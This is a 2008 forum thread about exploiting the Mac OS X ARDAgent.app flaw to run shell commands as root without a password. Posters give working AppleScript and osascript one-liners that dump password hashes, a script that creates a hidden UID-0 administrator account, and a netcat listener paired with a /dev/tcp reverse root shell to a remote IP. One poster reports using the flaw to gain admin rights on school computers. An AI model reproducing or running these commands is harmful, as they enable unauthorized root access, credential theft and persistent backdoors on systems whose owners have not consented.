Jump to content


Photo

remote login Trojan


  • Please log in to reply
683 replies to this topic

#431 andrewistheshit

andrewistheshit
  • Members
  • 2,193 posts

Posted 14 June 2008 - 12:37 AM

hmm well the app names compile for me in platpus i just wanted to change the image to something else and it never shows the image it just shows it like a priview file



#432 callmenames

callmenames
  • Members
  • 1,426 posts

Posted 14 June 2008 - 01:30 AM

Do you have write access?

#433 andrewistheshit

andrewistheshit
  • Members
  • 2,193 posts

Posted 14 June 2008 - 02:13 AM

it says i have custom access?

ughh wow my ipod is completely useless till i figure out this pwange tool thing....
yes i know this is a completely different thread but just thought i would mention that.

#434 callmenames

callmenames
  • Members
  • 1,426 posts

Posted 14 June 2008 - 02:13 AM

Is anyone else able to get 'ARDAgent.app' to execute a 'do shell script' command from Script Editor? This is very strange.

Try this AppleScript command in Script Editor...
CODE
tell application "ARDAgent.app" to do shell script "id"


Occasionally I have to run it a few times to get it to go, once I had to quit Script Editor and relaunch it before it ran. It's reproducible on a PPC/G4 Tiger/10.4.11 Mac here, and not at all on two others.

I'm extremely curious to know if this works for anyone else and if so, what version of OS X and does your Mac have a PowerPC or Intel processor?

I take that back, I just reproduced it on a PPC/G3 Tiger/10.4.11 as well - at first it did not work, I gave up trying and went to do something else, came back and that machine was asleep - woke it up, clicked run and it worked. Hmm.

Edited by callmenames, 14 June 2008 - 02:28 AM.


#435 andrewistheshit

andrewistheshit
  • Members
  • 2,193 posts

Posted 14 June 2008 - 02:41 AM

ill try it but where is shell script id located or was it stated in a handler of the apple script?
did i say that right?

#436 callmenames

callmenames
  • Members
  • 1,426 posts

Posted 14 June 2008 - 02:42 AM

Andrew, try...
ls -aloR /Volumes/FDSAFA/Treemovie.app

To see what the permissions are...

Or
chmod -Rf 777 /Volumes/FDSAFA/Treemovie.app
To give read/write/execute permission for all users.

And the AppleScript command is all that's required, just paste it into Script Editor and click run, if you get an error, keep trying it a dozen or so times. 'Do shell script' runs a command line, not only a script but the AppleScript command is 'do shell script'.

Sometimes I get this..


And sometimes I get this...
CODE
"uid=0(root) gid=501(G4admin) egid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)"


One time on each of two systems I got uid=0 and euid=501.

Needless to say, if I have ARDAgent.app run the reverse shell command (posted in this thread) instead of having System Events run it, it's a root shell. Without a password.

Edited by callmenames, 14 June 2008 - 02:55 AM.


#437 Wawl

Wawl
  • Members
  • 112 posts

Posted 14 June 2008 - 06:41 AM

CODE
tell application "ARDAgent.app" to do shell script "id"

Works fine for me ! (PPC Leopard). That a great vulnerability !
It also tested it at my school, it allows me to be admin without a password :-)
(My school has Tiger intel and ppc installed)

But you're right, it doesn't always work, but I just have to wait some seconds.

Edited by Wawl, 14 June 2008 - 06:44 AM.


#438 callmenames

callmenames
  • Members
  • 1,426 posts

Posted 14 June 2008 - 11:01 AM

I am flabbergasted as to why a setuid executable, owned by root can also execute 'do shell script' commands, but uh... well... happy hacking everybody! :)

Stoopid-easy ARDAgent tricks:
CODE
tell application "ARDAgent" to do shell script "cd /var/db/shadow/hash;for hashfile in $(ls -1 /var/db/shadow/hash);do [ ${hashfile} == ${hashfile/state} ] && echo ${hashfile} && cat ${hashfile} && echo; done; exit 0"


CODE
set hidden_admin_username to "nobodyd"
set hidden_admin_password to "a secret"
set hidden_admin_password_hash to do shell script "openssl passwd -crypt -salt xx '" & hidden_admin_password & "'"

tell application "ARDAgent" to do shell script "/usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' name '" & hidden_admin_username & "'; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' UniqueID 0; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' PrimaryGroupID 20; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' NFSHomeDirectory /var/root; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' home /var/root; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' UserShell /bin/bash; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' RealName ''; /usr/bin/sudo dscl . -append /Groups/admin GroupMembership '" & hidden_admin_username & "'; /usr/bin/sudo dscl . -append /Groups/wheel GroupMembership '" & hidden_admin_username & "'; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' naprivs -2147483394; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' authentication_authority 'basic'; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' passwd " & hidden_admin_password_hash

Edited by callmenames, 14 June 2008 - 11:08 AM.


#439 callmenames

callmenames
  • Members
  • 1,426 posts

Posted 14 June 2008 - 11:34 AM

Or from Terminal instead of Script Editor...
CODE
osascript -e 'tell application "ARDAgent" to do shell script "cd /var/db/shadow/hash;for hashfile in $(ls -1 /var/db/shadow/hash);do [ ${hashfile} == ${hashfile/state} ] && echo ${hashfile} && cat ${hashfile} && echo; done; exit 0"'


And to avoid having to run it repeatedly until it works...
CODE
while :; do hashes=$( osascript -e 'tell application "ARDAgent" to do shell script "cd /var/db/shadow/hash;for hashfile in $(ls -1 /var/db/shadow/hash);do [ ${hashfile} == ${hashfile/state} ] && echo ${hashfile} && cat ${hashfile} && echo; done; exit 0"' ); [ "${hashes}" != "" ] && echo "${hashes}" && break; done

Edited by callmenames, 14 June 2008 - 11:40 AM.


#440 callmenames

callmenames
  • Members
  • 1,426 posts

Posted 14 June 2008 - 12:23 PM

And for a full root reverse shell...
In Terminal on the receiving computer, run netcat to listen for the incoming connection. (Replace the 127.0.0.1 with the actual IP address of your computer or leave out the '-s 127.0.0.1' entirely. You may have to port-forward in your router and either turn off the OS X firewall or open the port.)
CODE
nc -s 127.0.0.1 -l -p 6880


The command line for the other computer... (change the 127.0.0.1 to the public IP address of the receiving computer.)
CODE
osascript -e 'tell application "ARDAgent" to do shell script "exec 6<>/dev/tcp/127.0.0.1/6880; id >&6; cat <&6 | while read input; do $input >&6 2>&6;echo -n \"${USER}@${HOSTNAME} > \" >&6;done"'

Edited by callmenames, 14 June 2008 - 12:24 PM.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users